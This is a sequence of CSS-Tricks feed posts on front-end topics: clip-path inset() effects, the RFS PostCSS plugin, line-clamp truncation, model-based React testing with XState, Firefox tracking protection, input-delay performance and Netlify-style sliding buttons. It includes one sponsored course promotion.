This is a method I really like, even though it cuts out pre-Chromium Edge and Internet Explorer support.

Pretty much every usage example of clip-path out there has either a polygon() value or an SVG reference value. However, if you've seen some of my previous articles, then you probably know there are other basic shapes we can use, like inset(), which works as illustrated below:

How the inset() function works. (Demo)

So, in order to reproduce the CodePen effect with this method, we set the ::after offsets to the expanded state values and then cut out what we don't want to see with the help of clip-path:

.single-item::after {
  top: -1rem;
  right: -1rem;
  bottom: -3em;
  left: -1em;
  clip-path: inset(2rem 0 2rem 2rem)
}

And then, in the :hover state, we zero all insets:

.single-item:hover::after { clip-path: inset(0) }

This can be seen in action below:

See the Pen by thebabydino (@thebabydino) on CodePen.

Alright, this works, but we also need a corner rounding. Fortunately, inset() lets us specify that too as whatever border-radius value we may wish.

Here, a 10px one for all corners along both directions does it:

.single-item::after {
  /* same styles as before */
  clip-path: inset(2rem 0 2rem 2rem round 10px)
}

.single-item:hover::after {
  clip-path: inset(0 round 10px)
}

And this gives us exactly what we were going for:

See the Pen by thebabydino (@thebabydino) on CodePen.

Furthermore, it doesn't really break anything in non-supporting browsers; it just always stays in the expanded state.

However, while this is a method that works great for a lot of situations — including the CodePen use case — it doesn't work when our expanding/shrinking elements have descendants that go outside their clipped parent's border-box, as is the case for the last example given with the previously discussed scaling method.

The post Various Methods for Expanding a Box While Preserving the Border Radius appeared first on CSS-Tricks.

Weekly Platform News: Text Spacing Bookmarklet, Top-Level Await, New AMP Loading Indicator

Css Tricks - Thu, 09/05/2019 - 9:15am

In this week's roundup, a handy bookmarklet for inspecting typography, using await to tinker with how JavaScript modules import one another, plus Facebook's in-app browser is only posing as one. Let's get into the news!

Check if your content breaks after increasing text spacing

Dylan Barrell from Deque has created a bookmarklet that you can use to check if there are any issues with the content or functionality of your website after increasing the line, paragraph, letter, and word spacing, according to the “Text Spacing” success criterion of the Web Content Accessibility Guidelines.
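If you'd rather poke at it by hand, the criterion boils down to your layout surviving overrides roughly like these (my paraphrase of the WCAG 1.4.12 values):

* {
  line-height: 1.5 !important;
  letter-spacing: 0.12em !important;
  word-spacing: 0.16em !important;
}

p {
  margin-bottom: 2em !important;
}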

(via Dylan Barrell)

Using top-level await in JavaScript modules

The proposed top-level await feature is especially useful in JavaScript modules: If module A uses top-level await (e.g., to connect to a database), and module B imports module A — via the import declaration — then the body of B will be evaluated after the body of A (i.e., B will correctly wait for A).

Top-level await enables modules to act as big async functions: with top-level await, ECMAScript Modules (ESM) can await resources, causing other modules that import them to wait before they start evaluating their body.
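A minimal sketch of the idea (the config file URL is just for illustration):

// a.mjs: evaluation of this module pauses until the await resolves
export const config = await fetch('/config.json').then((res) => res.json());

// b.mjs: its body only runs after a.mjs has finished awaiting
import { config } from './a.mjs';
console.log(config);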

(via Brian Kardell)

AMP’s new multi-stage loading indicator

AMP has created a new multi-stage loading indicator that has better perceived performance (tested on 2,500 users): It shows nothing until 0.5s, then an intermediate animation until 3.5s, and finally a looping spinner after that.

(via Andrew Watterson)

In other news...
  • AMP has released the <amp-script> element which, for the first time, allows AMP pages to add custom JavaScript, with some constraints: The code runs in a separate worker thread and requires a user gesture to change page content (via AMP Project).
  • The HTML Standard has made autofocus a global attribute that “applies to all elements, not just to form controls” (e.g., this change enables <div contenteditable autofocus>, but no browser supports this yet) (via Kent Tamura).
  • Facebook’s in-app browser (powered by Android's WebView) is not a browser: “Facebook is breaking the web for 20–30% of your traffic because you aren't demanding they do better” (via Alex Russell).

Read more news in my new, weekly Sunday issue. Visit webplatform.news for more information.

The post Weekly Platform News: Text Spacing Bookmarklet, Top-Level Await, New AMP Loading Indicator appeared first on CSS-Tricks.

Using a PostCSS function to automate your responsive workflow

Css Tricks - Thu, 09/05/2019 - 4:17am

A little while back, you might have bumped into this CSS-Tricks article where I described how a mixin can be used to automate responsive font sizes using RFS. In its latest version, v9, RFS is capable of rescaling any value for any CSS property with px or rem units, like margin, padding, border-radius or even box-shadow.

Today, we’ll focus on its PostCSS implementation. First thing to do, is install RFS with npm:

npm install rfs

Next step is to add RFS to the PostCSS plugins list. If you’re using a postcss.config.js file, you can add it to the list of other PostCSS plugins (e.g. Autoprefixer):

module.exports = {
  plugins: [
    require('rfs'),
    require('autoprefixer'),
  ]
}

Once configured, you’ll be able to use the rfs() function wherever you want in your custom CSS. For example, if you want your font sizes to be responsive:

.title { font-size: rfs(4rem); }

...or use it with whatever property you want:

.card {
  background-color: #fff;
  border-radius: rfs(4rem);
  box-shadow: rfs(0 0 2rem rgba(0, 0, 0, .25));
  margin: rfs(2rem);
  max-width: 540px;
  padding: rfs(3rem);
}

The code above will output the following CSS:

.card {
  background-color: #fff;
  border-radius: calc(1.525rem + 3.3vw);
  box-shadow: 0 0 calc(1.325rem + 0.9vw) rgba(0, 0, 0, .25);
  margin: calc(1.325rem + 0.9vw);
  max-width: 540px;
  padding: calc(1.425rem + 2.1vw);
}

@media (min-width: 1200px) {
  .card {
    border-radius: 4rem;
    box-shadow: 0 0 2rem rgba(0, 0, 0, .25);
    margin: 2rem;
    padding: 3rem;
  }
}

Demo

Here's a Pen that shows how things work. You can resize the demo to see the fluid rescaling in action.

See the Pen
RFS card- PostCSS
by Martijn Cuppens (@MartijnCuppens)
on CodePen.

A deeper look at how RFS parses the CSS

The plugin will look for any occurrence of the rfs() function in the declaration values and replace the function with a fluid value using the calc() function. After each rule, RFS will generate a media query with some additional CSS that prevents the values from becoming too large.

RFS only converts px and rem values in a declaration; all other values (e.g. em values, numbers or colors) will be ignored. The function can also be used multiple times in a declaration, like this:

box-shadow: 0 rfs(2rem) rfs(1.5rem) rgba(0, 0, 255, .6)

RFS and custom properties

:root {
  --title-font-size: rfs(2.125rem);
  --card-padding: rfs(3rem);
  --card-margin: rfs(2rem);
  --card-border-radius: rfs(4rem);
  --card-box-shadow: rfs(0 0 2rem rgba(0, 0, 0, .25));
}

These variables can be used in your CSS later on.

.card {
  max-width: 540px;
  padding: var(--card-padding);
  margin: var(--card-margin);
  background-color: #fff;
  box-shadow: var(--card-box-shadow);
  border-radius: var(--card-border-radius);
}

Hopefully you find these updates useful in your work. Leave a comment if you have any questions or feedback!

The post Using a PostCSS function to automate your responsive workflow appeared first on CSS-Tricks.

Learn Design for Developers and SVG Animation with Sarah Drasner ✨💖

Css Tricks - Thu, 09/05/2019 - 4:16am

(This is a sponsored post.)

Hey, Marc here from Frontend Masters — excited to support CSS-Tricks ❤️!

Have you checked out Sarah Drasner's courses yet? She has two awesome courses on Design for Developers and SVG! Plus another introducing Vue.js!

Design for Developers

In the Design for Developers course, you’ll learn to become self-sufficient throughout the entire lifecycle of the project — from concept to design to implementation!

You’ll learn to...

  • Code dynamic layouts and understand the principles of composition.
  • Select the typography that complements your design by following simple rules.
  • Choose color palettes, and understand the theory behind why they work together.
  • Know how and when to reach for design tools such as Photoshop or Sketch.
  • Use the correct image formats for performance.
  • Prototype to quickly communicate your ideas and get your layout up-and-running.
SVG Essentials and Animation

In the SVG Essentials and Animation course, you’ll learn to build and optimize SVG – the scalable graphics format for the web that can achieve impressively small file sizes for fast-loading websites.

You’ll learn to...

  • 〰 Create platonic and custom shapes with path commands.
  • ⚡️ Optimize SVG to achieve smaller file sizes for performance.
  • 💻 Assemble new SVGs with code and graphics programs.
  • 🖱 Control complex animations and timelines with user input.
  • 💥 Leverage GreenSock’s JavaScript libraries for immersive animation effects.
Introduction to Vue.js

In the Introduction to Vue.js course, you'll get started quickly with the Vue.js JavaScript framework!

You'll learn to...

  • Build custom, reusable components and animate them.
  • Use props, slots, and scoped styles to create flexible components.
  • Grok advanced features like filters and mixins for transforming data.
  • Get a single page application up and running fast with the Vue-CLI.
  • Work with Vuex to manage the state of larger-scale applications.

This course is for developers with an intermediate knowledge of JavaScript who want to learn how to build and maintain complex applications quickly and efficiently.

You'll love Sarah's awesome courses!

Direct Link to ArticlePermalink

The post Learn Design for Developers and SVG Animation with Sarah Drasner ✨💖 appeared first on CSS-Tricks.

Multiline truncated text with “show more” button

Css Tricks - Wed, 09/04/2019 - 11:53am

Now that we've got cross-browser support for the line-clamp property, I expect we'll see a lot more of it around the web. And as we start to see it more in use, it’s worth the reminder that truncation is not a content strategy.
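As a quick refresher, the cross-browser pattern still leans on the old flexbox prefixes and looks something like this (clamping to three lines here):

.truncate {
  display: -webkit-box;
  -webkit-line-clamp: 3;
  -webkit-box-orient: vertical;
  overflow: hidden;
}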

We should at least offer a way to read that truncated content, right? Paul Bakaus uses the checkbox hack and some other trickery to add a functional button that does exactly that.

See the Pen
truncated text w/ more button (CSS only, with optional JS helper)
by Paul Bakaus (@pbakaus)
on CodePen.

Direct Link to ArticlePermalink

The post Multiline truncated text with “show more” button appeared first on CSS-Tricks.

Model-Based Testing in React with State Machines

Css Tricks - Wed, 09/04/2019 - 4:24am

Testing applications is crucially important to ensuring that the code is error-free and the logic requirements are met. However, writing tests manually is tedious and prone to human bias and error. Furthermore, maintenance can be a nightmare, especially when features are added or business logic is changed. We’ll learn how model-based testing can eliminate the need to manually write integration and end-to-end tests, by automatically generating full tests that keep up-to-date with an abstract model for any app.

From unit tests to integration tests, end-to-end tests, and more, there are many different testing methods that are important in the development of non-trivial software applications. They all share a common goal, but at different levels: ensure that when anyone uses the application, it behaves exactly as expected without any unintended states, bugs, or worse, crashes.

Testing Trophy showing importance of different types of tests

Kent C. Dodds describes the practical importance of writing these tests in his article, Write tests. Not too many. Mostly integration. Some tests, like static and unit tests, are easy to author, but don't completely ensure that every unit will work together. Other tests, like integration and end-to-end (E2E) tests, take more time to author, but give you much more confidence that the application will work as the user expects, since they replicate scenarios similar to how a user would use the application in real life.

So why are there rarely many integration or E2E tests in applications nowadays, yet hundreds (if not thousands) of unit tests? The reasons range from not enough resources, not enough time, or not enough understanding of the importance of writing these tests. Furthermore, even if numerous integration/E2E tests are written, if one part of the application changes, most of those long and complicated tests need to be rewritten, and new tests need to be written. Under deadlines, this quickly becomes infeasible.

From Automated to Autogenerated

The status-quo of application testing is:

  1. Manual testing, where no automated tests exist, and app features and user flows are tested manually
  2. Writing automated tests, which are scripted tests that can be executed automatically by a program, instead of being manually tested by a human
  3. Test automation, which is the strategy for executing these automated tests in the development cycle.

Needless to say, test automation saves a lot of time in executing the tests, but the tests still need to be manually written. It would sure be nice to tell some sort of tool: "Here is a description of how the application is supposed to behave. Now generate all the tests, even the edge cases."

Thankfully, this idea already exists (and has been researched for decades), and it's called model-based testing. Here's how it works:

  1. An abstract "model" that describes the behavior of your application (in the form of a directed graph) is created
  2. Test paths are generated from the directed graph
  3. Each "step" in the test path is mapped to a test that can be executed on the application.

Each integration and E2E test is essentially a series of steps that alternate between:

  1. Verify that the application looks correct (a state)
  2. Simulate some action (to produce an event)
  3. Verify that the application looks right after the action (another state)

If you’re familiar with the given-when-then style of behavioral testing, this will look familiar:

  1. Given some initial state (precondition)
  2. When some action occurs (behavior)
  3. Then some new state is expected (postcondition).

A model can describe all the possible states and events, and automatically generate the "paths" needed to get from one state to another, just like Google Maps can generate the possible routes between one location and another. Just like a map route, each path is a collection of steps needed to get from point A to point B.

Integration Testing Without a Model

To better explain this, consider a simple "feedback" application. We can describe it like so:

  • A panel appears asking the user, "How was your experience?"
  • The user can click "Good" or "Bad"
  • When the user clicks "Good," a screen saying "Thanks for your feedback" appears.
  • When the user clicks "Bad," a form appears, asking for further information.
  • The user can optionally fill out the form and submit the feedback.
  • When the form is submitted, the thanks screen appears.
  • The user can click "Close" or press the Escape key to close the feedback app on any screen.

See the Pen
Untitled by David Khourshid (@davidkpiano)
on CodePen.

Manually Testing the App

The @testing-library/react library makes it straightforward to render React apps in a testing environment with its render() function. This returns useful methods, such as:

  • getByText, which identifies DOM elements by the text contained inside of them
  • baseElement, which represents the root document.documentElement and will be used to trigger a keyDown event
  • queryByText, which will not throw an error if a DOM element containing the specified text is missing (so we can assert that nothing is rendered)
import Feedback from './App';
import { render, fireEvent, cleanup } from '@testing-library/react';

// ...

// Render the feedback app
const {
  getByText,
  getByTitle,
  getByPlaceholderText,
  baseElement,
  queryByText
} = render(<Feedback />);

// ...

More information can be found in the @testing-library/react documentation. Let's write a couple integration tests for this with Jest (or Mocha) and @testing-library/react:

import { render, fireEvent, cleanup } from '@testing-library/react';

describe('feedback app', () => {
  afterEach(cleanup);

  it('should show the thanks screen when "Good" is clicked', () => {
    const { getByText } = render(<Feedback />);

    // The question screen should be visible at first
    assert.ok(getByText('How was your experience?'));

    // Click the "Good" button
    fireEvent.click(getByText('Good'));

    // Now the thanks screen should be visible
    assert.ok(getByText('Thanks for your feedback.'));
  });

  it('should show the form screen when "Bad" is clicked', () => {
    const { getByText } = render(<Feedback />);

    // The question screen should be visible at first
    assert.ok(getByText('How was your experience?'));

    // Click the "Bad" button
    fireEvent.click(getByText('Bad'));

    // Now the form screen should be visible
    assert.ok(getByText('Care to tell us why?'));
  });
});

Not too bad, but you'll notice that there's some repetition going on. At first, this isn't a big deal (tests shouldn't necessarily be DRY), but these tests can become less maintainable when:

  • Application behavior changes, such as adding new steps or deleting steps
  • User interface elements change, in a way that might not even be a simple component change (such as trading a button for a keyboard shortcut or gesture)
  • Edge cases start occurring and need to be accounted for.

Furthermore, E2E tests will test the exact same behavior (albeit in a more realistic testing environment, such as a live browser with Puppeteer or Selenium), yet they cannot reuse the same tests since the code for executing the tests is incompatible with those environments.

The State Machine as an Abstract Model

Remember the informal description of our feedback app above? We can translate that into a model that represents the different states, events, and transitions between states the app can be in; in other words, a finite state machine. A finite state machine is a representation of:

  • The finite states in the app (e.g., question, form, thanks, closed)
  • An initial state (e.g., question)
  • The events that can occur in the app (e.g., CLICK_GOOD, CLICK_BAD for clicking the good/bad buttons, CLOSE for clicking the close button, and SUBMIT for submitting the form)
  • Transitions, or how one state transitions to another state due to an event (e.g., when in the question state and the CLICK_GOOD action is performed, the user is now in the thanks state)
  • Final states (e.g., closed), if applicable.

The feedback app's behavior can be represented with these states, events, and transitions in a finite state machine, and looks like this:

A visual representation can be generated from a JSON-like description of the state machine, using XState:

import { Machine } from 'xstate';

const feedbackMachine = Machine({
  id: 'feedback',
  initial: 'question',
  states: {
    question: {
      on: {
        CLICK_GOOD: 'thanks',
        CLICK_BAD: 'form',
        CLOSE: 'closed'
      }
    },
    form: {
      on: {
        SUBMIT: 'thanks',
        CLOSE: 'closed'
      }
    },
    thanks: {
      on: {
        CLOSE: 'closed'
      }
    },
    closed: {
      type: 'final'
    }
  }
});

If you're interested in diving deeper into XState, you can read the XState docs, or read a great article about using XState with React by Jon Bellah. Note that this finite state machine is used only for testing, and not in our actual application — this is an important principle of model-based testing, because it represents how the user expects the app to behave, and not its actual implementation details. The app doesn’t necessarily need to be created with finite state machines in mind (although it’s a very helpful practice).

Creating a Test Model

The app's behavior is now described as a directed graph, where the nodes are states and the edges (or arrows) are events that denote the transitions between states. We can use that state machine (the abstract representation of the behavior) to create a test model. The @xstate/test library contains a createModel function to do that:

import { Machine } from 'xstate';
import { createModel } from '@xstate/test';

const feedbackMachine = Machine({/* ... */});

const feedbackModel = createModel(feedbackMachine);

This test model is an abstract model which represents the desired behavior of the system under test (SUT) — in this example, our app. With this testing model, test plans can be created which we can use to test that the SUT can reach each state in the model. A test plan describes the test paths that can be taken to reach a target state.

Verifying States

Right now, this model is a bit useless. It can generate test paths (as we’ll see in the next section) but to serve its purpose as a model for testing, we need to add a test for each of the states. The @xstate/test package will read these test functions from meta.test:

const feedbackMachine = Machine({
  id: 'feedback',
  initial: 'question',
  states: {
    question: {
      on: {
        CLICK_GOOD: 'thanks',
        CLICK_BAD: 'form',
        CLOSE: 'closed'
      },
      meta: {
        // getByTestId, etc. will be passed into path.test(...) later.
        test: ({ getByTestId }) => {
          assert.ok(getByTestId('question-screen'));
        }
      }
    },
    // ... etc.
  }
});

Notice that these are the same assertions from the manually written tests we’ve created previously with @testing-library/react. The purpose of these tests is to verify the precondition that the SUT is in the given state before executing an event.

Executing Events

To make our test model complete, we need to make each of the events, such as CLICK_GOOD or CLOSE, “real” and executable. That is, we have to map these events to actual actions that will be executed in the SUT. The execution functions for each of these events are specified in createModel(…).withEvents(…):

import { Machine } from 'xstate';
import { createModel } from '@xstate/test';

const feedbackMachine = Machine({/* ... */});

const feedbackModel = createModel(feedbackMachine)
  .withEvents({
    // getByTestId, etc. will be passed into path.test(...) later.
    CLICK_GOOD: ({ getByText }) => {
      fireEvent.click(getByText('Good'));
    },
    CLICK_BAD: ({ getByText }) => {
      fireEvent.click(getByText('Bad'));
    },
    CLOSE: ({ getByTestId }) => {
      fireEvent.click(getByTestId('close-button'));
    },
    SUBMIT: {
      exec: async ({ getByTestId }, event) => {
        fireEvent.change(getByTestId('response-input'), {
          target: { value: event.value }
        });
        fireEvent.click(getByTestId('submit-button'));
      },
      cases: [{ value: 'something' }, { value: '' }]
    }
  });

Notice that you can either specify each event as an execution function, or (in the case of SUBMIT) as an object with the execution function specified in exec and sample event cases specified in cases.

From Model To Test Paths

Take a look at the visualization again and follow the arrows, starting from the initial question state. You'll notice that there are many possible paths you can take to reach any other state. For example:

  • From the question state, the CLICK_BAD event transitions to...
  • the form state, and then the SUBMIT event transitions to...
  • the thanks state, and then the CLOSE event transitions to...
  • the closed state.

Since the app's behavior is a directed graph, we can generate all the possible simple paths or shortest paths from the initial state. A simple path is a path where no node is repeated. That is, we're assuming the user isn't going to visit a state more than once (although that might be a valid thing to test for in the future). A shortest path is the shortest of these simple paths.

Rather than explaining algorithms for traversing graphs to find shortest paths (Vaidehi Joshi has great articles on graph traversal if you're interested in that), the test model we created with @xstate/test has a .getSimplePathPlans(…) method that generates test plans.

Each test plan represents a target state and simple paths from the initial state to that target state. Each test path represents a series of steps to get to that target state, with each step including a state (precondition) and an event (action) that is executed after verifying that the app is in the state.

For example, a single test plan can represent reaching the thanks state, and that test plan can have one or more paths for reaching that state, such as question -- CLICK_BAD → form -- SUBMIT → thanks, or question -- CLICK_GOOD → thanks:

// Get test plans to all states via simple paths
const testPlans = testModel.getSimplePathPlans();

We can then loop over these plans to describe each state. The plan.description is provided by @xstate/test, such as reaches state: "question":

testPlans.forEach(plan => {
  describe(plan.description, () => {
    // ...
  });
});

And each path in plan.paths can be tested, also with a provided path.description like via CLICK_GOOD → CLOSE:

testPlans.forEach(plan => {
  describe(plan.description, () => {
    // Do any cleanup work after testing each path
    afterEach(cleanup);

    plan.paths.forEach(path => {
      it(path.description, async () => {
        // Test setup
        const rendered = render(<Feedback />);

        // Test execution
        await path.test(rendered);
      });
    });
  });
});

Testing a path with path.test(…) involves:

  1. Verifying that the app is in some state of a path’s step
  2. Executing the action associated with the event of a path’s step
  3. Repeating 1. and 2. until there are no more steps
  4. Finally, verifying that the app is in the target plan.state.

Finally, we want to ensure that each of the states in our test model were tested. When the tests are run, the test model keeps track of the tested states, and provides a testModel.testCoverage() function which will fail if not all states were covered:

it('coverage', () => { testModel.testCoverage(); });

Overall, our test suite looks like this:

import React from 'react';
import Feedback from './App';
import { Machine } from 'xstate';
import { render, fireEvent, cleanup } from '@testing-library/react';
import { assert } from 'chai';
import { createModel } from '@xstate/test';

describe('feedback app', () => {
  const feedbackMachine = Machine({/* ... */});

  const testModel = createModel(feedbackMachine)
    .withEvents({/* ... */});

  const testPlans = testModel.getSimplePathPlans();

  testPlans.forEach(plan => {
    describe(plan.description, () => {
      afterEach(cleanup);

      plan.paths.forEach(path => {
        it(path.description, () => {
          const rendered = render(<Feedback />);
          return path.test(rendered);
        });
      });
    });
  });

  it('coverage', () => {
    testModel.testCoverage();
  });
});

This might seem like a bit of setup, but manually scripted integration tests need to have all of this setup anyway, in a much less abstracted way. One of the major advantages of model-based testing is that you only need to set this up once, whether you have 10 tests or 1,000 tests generated.

Running the Tests

In create-react-app, the tests are run using Jest via the command npm test (or yarn test). When the tests run, assuming they all pass, the output will look something like this:

PASS src/App.test.js
  feedback app
    ✓ coverage
    reaches state: "question"
      ✓ via  (44ms)
    reaches state: "thanks"
      ✓ via CLICK_GOOD (17ms)
      ✓ via CLICK_BAD → SUBMIT ({"value":"something"}) (13ms)
    reaches state: "closed"
      ✓ via CLICK_GOOD → CLOSE (6ms)
      ✓ via CLICK_BAD → SUBMIT ({"value":"something"}) → CLOSE (11ms)
      ✓ via CLICK_BAD → CLOSE (10ms)
      ✓ via CLOSE (4ms)
    reaches state: "form"
      ✓ via CLICK_BAD (5ms)

Test Suites: 1 passed, 1 total
Tests: 9 passed, 9 total
Snapshots: 0 total
Time: 2.834s

That's nine tests automatically generated with our finite state machine model of the app! Every single one of those tests asserts that the app is in the correct state and that the proper actions are executed (and validated) to transition to the next state at each step, and finally asserts that the app is in the correct target state.

These tests can quickly grow as your app gets more complex; for instance, if you add a back button to each screen, add some validation logic to the form page (please don't; be thankful the user is even going through the feedback form in the first place), or add a loading state when submitting the form, the number of possible paths will increase.

Advantages of Model-Based Testing

Model-based testing greatly simplifies the creation of integration and E2E tests by autogenerating them based on a model (like a finite state machine), as demonstrated above. Since manually writing full tests is eliminated from the test creation process, adding or removing new features no longer becomes a test maintenance burden. The abstract model only needs to be updated, without touching any other part of the testing code.

For example, if you want to add the feature that the form shows up whether the user clicks the "Good" or "Bad" button, it's a one-line change in the finite state machine:

// ...
question: {
  on: {
    // CLICK_GOOD: 'thanks',
    CLICK_GOOD: 'form',
    CLICK_BAD: 'form',
    CLOSE: 'closed',
    ESC: 'closed'
  },
  meta: {/* ... */}
},
// ...

All tests that are affected by the new behavior will be updated. Test maintenance is reduced to maintaining the model, which saves time and prevents errors that can be made in manually updating tests. This has been shown to improve efficiency in both developing and testing production applications, especially as used at Microsoft on recent customer projects — when new features were added or changes made, the autogenerated tests gave immediate feedback on which parts of the app logic were affected, without needing to manually regression test various flows.

Additionally, since the model is abstract and not tied to implementation details, the exact same model, as well as most of the testing code, can be used to author E2E tests. The only things that would change are the tests for verifying the state and the execution of the actions. For example, if you were using Puppeteer, you can update the state machine:

// ...
question: {
  on: {
    CLICK_GOOD: 'thanks',
    CLICK_BAD: 'form',
    CLOSE: 'closed'
  },
  meta: {
    test: async (page) => {
      await page.waitFor('[data-testid="question-screen"]');
    }
  }
},
// ...

const testModel = createModel(/* ... */)
  .withEvents({
    CLICK_GOOD: async (page) => {
      const goodButton = await page.$('[data-testid="good-button"]');
      await goodButton.click();
    },
    // ...
  });

And then these tests can be run against a live Chromium browser instance:

The tests are autogenerated just the same, and this cannot be overstated. Although it just seems like a fancy way to create DRY test code, it goes exponentially further than that — autogenerated tests can exhaustively represent paths that explore all the possible actions a user can do at all possible states in the app, which can readily expose edge-cases that you might not have even imagined.

The code for both the integration tests with @testing-library/react and the E2E tests with Puppeteer can be found in the XState test demo repository.

Challenges to Model-Based Testing

Since model-based testing shifts the work from manually writing tests to manually writing models, there is a learning curve. Creating the model necessitates the understanding of finite state machines, and possibly even statecharts. Learning these are greatly beneficial for more reasons than just testing, since finite state machines are one of the core principles of computer science, and statecharts make state machines more flexible and scalable for complex app and software development. The World of Statecharts by Erik Mogensen is a great resource for understanding and learning how statecharts work.

Another issue is that the algorithm for traversing the finite state machine can generate exponentially many test paths. This can be considered a good problem to have, since every one of those paths represents a valid way that a user can potentially interact with an app. However, this can also be computationally expensive and result in semi-redundant tests that your team would rather skip to save testing time. There are also ways to limit these test paths, e.g., using shortest paths instead of simple paths, or by refactoring the model. Excessive tests can be a sign of an overly complex model (or even an overly complex app 😉).

Write Fewer Tests!

Modeling app behavior is not the easiest thing to do, but there are many benefits of representing your app as a declarative and abstract model, such as a finite state machine or a statechart. Even though the concept of model-based testing is over two decades old, it is still an evolving field. But with the above techniques, you can get started today and take advantage of generating integration and E2E tests instead of manually writing every single one of them.

More resources:

I gave a talk at React Rally 2019 demonstrating model-based testing in React apps:

Slides: Write Fewer Tests! From Automation to Autogeneration

Happy testing!

The post Model-Based Testing in React with State Machines appeared first on CSS-Tricks.

Firefox blocks third-party tracking cookies and cryptominers

Css Tricks - Wed, 09/04/2019 - 4:18am

This is super interesting stuff from Mozilla: the most recent update of Firefox will now block cryptominers and third-party tracking scripts by default. In the press release they write:

For today’s release, Enhanced Tracking Protection will automatically be turned on by default for all users worldwide as part of the ‘Standard’ setting in the Firefox browser and will block known “third-party tracking cookies” according to the Disconnect list. We first enabled this default feature for new users in June 2019. As part of this journey we rigorously tested, refined, and ultimately landed on a new approach to anti-tracking that is core to delivering on our promise of privacy and security as central aspects of your Firefox experience.

Compare this to a Vox interview with Mat Marquis discussing Google's efforts to make Chrome more private:

“Google is an advertising company, not a group of concerned altruists; there aren’t any charts at stakeholder meetings showing what amount they ‘saved the web’ this past quarter. They’re notorious for overstepping and outright abusing users’ personal data in pursuit of, well, making money as an advertising company,” Mat Marquis, a web developer, told Recode. “Their business model — the thing that keeps all these genuinely brilliant, genuinely well-meaning designers and developers employed — depends on convincing a company that they can make their users look at your ads.”

This is yet another reason why Firefox is my browser of choice and why, as concerned web designers and developers, I suggest others consider joining me in making the switch.

Direct Link to ArticlePermalink

The post Firefox blocks third-party tracking cookies and cryptominers appeared first on CSS-Tricks.

Fast Software

Css Tricks - Tue, 09/03/2019 - 4:22am

There have been some wonderfully interconnected things about fast software lately.

We talk a lot about performance on the web. We can make things a little faster here and there. We see rises in success metrics with rises in performance. I find those types of charts very satisfying. But perhaps even more interesting is to think about the individual people that speed affects. It can be the difference between I love this software and Screw this, I'm out.

Craig Mod, in "Fast Software, the Best Software", totally bailed on Google Maps:

Google Maps has gotten so slow, that I did the unthinkable: I reinstalled Apple Maps on my iPhone. Apple Maps in contrast, today, is downright zippy and responsive. The data still isn’t as good as Google Maps, but this a good example of where slowness pushed me to reinstall an app I had all but written off. I’ll give Apple Maps more of a chance going forward.

And puts a point on it:

But why is slow bad? Fast software is not always good software, but slow software is rarely able to rise to greatness. Fast software gives the user a chance to “meld” with its toolset. That is, not break flow.

Sometimes it's even life and death! Hillel Wayne, in "Performance Matters," says emergency workers in an ambulance don't use the built-in digital "Patient Care Report" (PCR) system, instead opting for paper and pencil, simply because the PCR is a little slow:

The ambulance I shadowed had an ePCR. Nobody used it. I talked to the EMTs about this, and they said nobody they knew used it either. Lack of training? No, we all got trained. Crippling bugs? No, it worked fine. Paper was good enough? No, the ePCR was much better than paper PCRs in almost every way. It just had one problem: it was too slow.

It wasn’t even that slow. Something like a quarter-second lag when you opened a dropdown or clicked a button. But it made things so unpleasant that nobody wanted to touch it. Paper was slow and annoying and easy to screw up, but at least it wasn’t that.

"Input delay" is a key concept here. Just the kind of thing that can occur on the web if your JavaScript is doin' stuff and, as they say, "occupying the main thread."

Monica Dinculescu created a Typing delay experiment that simulates this input delay. The "we're done here" setting of 200ms is absolutely well-named. I'd never use software that felt like that. Jay Peters over on The Verge agreed, and anything higher is exponentially worse.

Extra interesting: random delay is worse than consistent large delays, which is probably a more likely scenario on our own sites.

The post Fast Software appeared first on CSS-Tricks.

Recreating Netlify’s Neat-o Sliding Button Effect

Css Tricks - Tue, 09/03/2019 - 4:22am

Have you seen Netlify's press page? It's one of those places where you can snag a download of the company's logo. I was looking for it this morning because I needed the logo to use as a featured image for a post here on CSS-Tricks.

Well, I noticed they have these pretty looking buttons to download the logo. They're small and sharp. They grab attention but aren't in the way.

They're also interactive! Look at the way they expand and reveal the word "Download" on hover.

Nice, right?! I actually noticed that they looked a little off in Safari.

That made me curious about how they're made. So, I recreated them here as a demo while cleaning up some of the spacing stuff:

See the Pen Netlify Sliding Buttons by Geoff Graham (@geoffgraham) on CodePen.

How'd they do it? The recipe really comes down to four ingredients:

  • Using the left property to slide the "Download" label in and out of view
  • Using padding on the button's hover state to create additional room for showing the "Download" label on hover
  • Declaring a 1:1 scale() on the button's hover state so all the content stays contained when things move around.
  • Specifying a transition on the button's padding, the background-position of the button icon, and the transform property to make for a smooth animation between the button's default and hover states.

Here's what that looks like without all the presentation styles:

See the Pen Style-less Netlify Sliding Buttons by Geoff Graham (@geoffgraham) on CodePen.

If you're having a tough time visualizing what's happening, here's an illustration showing how the "Download" label is hidden outside of the button (thanks to overflow: hidden) and where it's pushed into view on hover.

So, by putting negative left values on the icon and the "Download" label, we're pushing them out of view and then resetting those to positive values when the entire button is hovered.

/* Natural State */
.button {
  background: #f6bc00 url(data:image/svg+xml;base64,...) no-repeat -12px center;
  overflow: hidden;
}
.button span:nth-child(1) {
  position: absolute;
  left: -70px;
}

/* Hovered State */
.button:hover {
  padding-left: 95px;
  background-position: 5px center;
}
.button:hover span:nth-child(1) {
  left: 70px; /* back to a positive value so the label slides into view */
}

Notice that leaving things in this state would let the button icon slide into view and create enough room for the "Download" label, but the label would actually float off the button on hover.

See the Pen Style-less Netlify Sliding Buttons by Geoff Graham (@geoffgraham) on CodePen.

That's where adding a 1:1 scale on the button helps keep things intact.

/* Hovered State */
.button:hover {
  padding-left: 95px;
  background-position: 5px center;
  transform: scale(1, 1);
}

Those padding values are magic numbers. They'll be different for you based on the font, font-size, and other factors, so your mileage may vary.

The last core ingredient is the transition property, which makes everything slide smoothly into place rather than letting things snap. It provides a much nicer experience.

/* Natural State */
.button {
  background: #f6bc00 url(data:image/svg+xml;base64,...) no-repeat -12px center;
  overflow: hidden;
  transition: padding .2s ease, background-position .2s ease, transform .5s ease;
}

Toss in some little flourishes, like rounded corners and such, and you've got a pretty slick button.
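For instance, here are a couple of purely illustrative flourishes; the values are my own, not taken from the Netlify buttons:

/* Hypothetical finishing touches; tune to taste */
.button {
  border-radius: 2em;
  box-shadow: 0 2px 6px rgba(0, 0, 0, 0.25);
}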

See the Pen Netlify Sliding Buttons by Geoff Graham (@geoffgraham) on CodePen.

The post Recreating Netlify’s Neat-o Sliding Button Effect appeared first on CSS-Tricks.

Need to scroll to the top of the page?

Css Tricks - Mon, 09/02/2019 - 4:07am

Perhaps the easiest way to offer that to the user is a link that targets an ID on the <html> element. So like...

<html id="top">
